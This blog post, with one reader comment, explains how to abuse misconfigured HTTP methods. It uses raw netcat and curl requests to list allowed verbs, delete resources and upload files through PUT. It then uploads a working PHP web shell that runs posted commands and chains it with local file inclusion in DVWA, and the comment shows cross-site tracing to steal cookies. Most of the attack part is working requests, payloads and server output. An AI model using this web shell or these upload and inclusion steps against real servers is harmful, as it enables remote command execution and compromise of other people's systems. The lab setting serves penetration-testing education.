Exploiting HTTP Verbs

The HTTP protocol comprises of the following verbs or methods.

  • GET
  • HEAD
  • POST
  • PUT
  • DELETE
  • CONNECT
  • OPTIONS
  • TRACE

I assume you are well aware of these, you can read more about them in detail from this RFC document.

I will show some interesting HTTP verbs which can be used to break into servers. Well, these attacks can be very rare but thought of sharing  🙂

OPTIONS

The OPTIONS verb is enabled in the server it can be used to view all the HTTP methods configured.

% nc localhost 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Sun, 14 Jun 2015 05:31:10 GMT
Connection: close

DELETE

The DELETE verb is a dangerous verb and can be misused. If this is misconfigured, can be use to delete resources from the web server.

% nc localhost 80
DELETE  /location/resource HTTP/1.0

Date: Sun, 14 Jun 2015 05:01:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

PUT

This verb can be used to upload a resource into the server. This is also a risky verb if not configured applicably. For example suppose we want to write “<?php echo ‘Hello World’; ?>” in a new file as “hello.php”. Make sure you give the correct length of your payload.

%  cat -e hello.php 
<?php echo 'Hello World'; ?>$

% wc -m hello.php 
29 hello.php

% nc localhost 80
PUT /hello.php HTTP/1.0
Content-Type: text/html
Content-Length: 29

<?php echo 'Hello World'; ?>

PUT verb in PHP

PHP has the support for the PUT verb. This is a sample program which will receive the data from the PUT request and save it as “myfile”.

<?php
    $putdata = fopen("php://input", "r");
    $fp = fopen("myfile", "w");
    while ($data = fread($putdata, 1024)) fwrite($fp, $data);
    fclose($fp);
    fclose($putdata);
?>

I will save this as “put.php” in my root directory of the web server.
Now we can request “put.php” using the PUT verb and send our payload.

% cat -e phpinfo.php 
<?php phpinfo(); ?>$

% wc -m phpinfo.php 
20 phpinfo.php

% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 20

<?php phpinfo(); ?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 06:48:16 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html

Now if you view “myfile” our payload should be nice written.
Suppose you have a local file inclusion situation, in cases like that we can include our newly written file using PUT 
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.

<?php
    echo "File included: ".$_REQUEST["page"]."&lt;br&gt;";
    $file =  $_REQUEST["page"];
    include $file;
?>

http://localhost/dvwa/vulnerabilities/fi/?page=../../../myfile

Suppose we want to upload a simple web shell we can do it like the following 😉

% wc -m shell.php 
189 shell.php

% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 189

<?php

print '<form method="post">
Command: <input type="text" name="__"><br>
<input type="submit">
</form>';

if(isset($_POST["__"]))
	print '<pre>'.shell_exec($_POST["__"]).'</pre>';

?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 07:39:42 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html 

After that include our “myfile” and you can execute commands on the server.

You can also use curl to upload a file using PUT easily.

% curl http://192.168.1.5/put.php --upload-file shell.php -v
* About to connect() to 192.168.1.5 port 80 (#0)
*   Trying 192.168.1.5...
* connected
* Connected to 192.168.1.5 (192.168.1.5) port 80 (#0)
> PUT /put.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 192.168.1.5
> Accept: */*
> Content-Length: 189
> Expect: 100-continue
> 
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 100 Continue
* additional stuff not fine transfer.c:1037: 0 0
* We are completely uploaded and fine
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Mon, 15 Jun 2015 07:47:44 GMT
< Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
< X-Powered-By: PHP/5.4.22
< Content-Length: 0
< Content-Type: text/html
< 
* Connection #0 to host 192.168.1.5 left intact
* Closing connection #0

Thanks for reading !

References

[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
[2] https://tools.ietf.org/html/rfc7231

Advertisements

5 thoughts on “Exploiting HTTP Verbs

    • In TRACE method you can inject your own header for example:

      root@kali:~/temp# curl -v -X TRACE -H "X-Header: Osanda" Host.com
      * About to connect() to Host.com port 80 (#0)
      * Trying 1.1.1.1...
      * connected
      * Connected to Host.com (1.1.1.1) port 80 (#0)
      > TRACE / HTTP/1.1
      > User-Agent: curl/7.26.0
      > Host: Host.com
      > Accept: */*
      > X-Header: Osanda
      >
      * additional stuff not fine transfer.c:1037: 0 0
      * HTTP 1.1 or later with persistent connection, pipelining supported
      < HTTP/1.1 200 OK
      < Date: Wed, 17 Jun 2015 07:58:18 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Connection: close
      < Transfer-Encoding: chunked
      < Content-Type: message/http
      <
      TRACE / HTTP/1.1
      User-Agent: curl/7.26.0
      Host: Host.com
      Accept: */*
      X-Header: Osanda

      This can lead to stealing of cookies even if the HttpOnly flags are set.
      More information on XST attacks:
      https://www.owasp.org/index.php/Cross_Site_Tracing

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s